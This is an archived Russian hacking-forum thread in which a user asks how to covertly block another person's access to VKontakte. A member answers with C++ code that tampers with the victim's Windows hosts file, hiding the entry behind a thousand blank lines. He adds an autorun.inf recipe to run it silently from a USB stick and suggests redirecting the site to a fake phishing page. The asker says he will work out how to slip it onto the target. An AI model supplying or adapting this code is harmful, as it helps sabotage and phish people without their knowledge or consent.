Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Блокировка вконтакте.

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Первый вопрос] >> Блокировка вконтакте.
Имя
Сообщение << Старые топики   Новые топики >>
Блокировка вконтакте. - 2012-03-20 17:51:14.573333   
гена123456

Сообщений: 3
Оценки: 0
Присоединился: 2012-03-20 17:41:54.456666
Здраствуйте, у меня такой вопрос…возможно закинуть человеку через страницу вконткте вирус, блокируюший доступ к этому сайту ? может меняюший файл hosts..либо ссылку туда где его можно подцепить? может есть какие то другие способы? одним словом, можно ли лишить человека доступа в контакт удаленно? человек нуб)
Post #: 1
RE: Блокировка вконтакте. - 2012-03-20 18:38:23.900000   
zzsnn

Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
Простейшее - редактирование файла hosts.
Post #: 2
RE: Блокировка вконтакте. - 2012-03-20 19:40:36.720000   
гена123456

Сообщений: 3
Оценки: 0
Присоединился: 2012-03-20 17:41:54.456666
я видимо не так выразился, дело в том, что к компу человека я не имею доступа … потому и думаю как можно ему впарить трой или что то подобное , которое ему заблокирует , хотя бы на время доступ в контакт…
Post #: 3
RE: Блокировка вконтакте. - 2012-03-20 22:16:53.493333   
zzsnn

Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
На Cи код файла для подмены будет примерно такой:
#include <iostream>
#include <fstream>
using namespace std;
int main()
{
freopen("C:/WINDOWS/system32/drivers/etc/hosts","at",stdout);//переадресация iostream на fstream запись
for(int i=0; i<1000; i++)
cout<<endl; //заполняем файл hosts тысячью пустых строк, что бы не палиться
cout<<"127.0.0.1 vkontakte.ru"; // это строка блокировки
return 0;
}
Сохраняем и компилявим под нужным именем. Кидаем на флешку.
Далее создаём autorun.inf в корне флешки
[AutoRun]
shellexecute=название_программы
Action=то_что_будет_писаться_до_автозапуска
Icon=иконка
Label=название_флешки
Сохраняем.
Вставляем флешку в нужный комп - если у человека автозапуск с флешки открыт - он получит подмену hosts.
Работать будет если Win на диске C:. Если не так - поставишь другой диск. Иначе эта прога просто создаст на C: папку WINDOWS/system32/drivers/etc с файлом hosts. Что не айс.
cout<<"127.0.0.1 vkontakte.ru"; - можно заменить на любой другой адрес, например на фейковую (подменную страницу).
Post #: 4
RE: Блокировка вконтакте. - 2012-03-21 04:15:28.993333   
Genco

Сообщений: 1662
Оценки: 90
Присоединился: 2007-12-16 23:11:22.003333
…и остается подумать, как обойти если не UAC, то защиту hosts привилегиями на Vista/Win 7 ?
Post #: 5
RE: Блокировка вконтакте. - 2012-03-21 06:37:16.566666   
zzsnn

Сообщений: 7459
Оценки: 680
Присоединился: 2007-09-25 07:17:14.240000
Ну это уже не ко мне вопрос.
Просили простейший способ блокировки - я дал. А как это впарить - это уже другой вопрос.
Post #: 6
RE: Блокировка вконтакте. - 2012-03-21 12:10:01.423333   
гена123456

Сообщений: 3
Оценки: 0
Присоединился: 2012-03-20 17:41:54.456666
большое спасибо)

буду думать как впарить…
Post #: 7
Страниц:  [1]
Все форумы >> [Первый вопрос] >> Блокировка вконтакте.







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.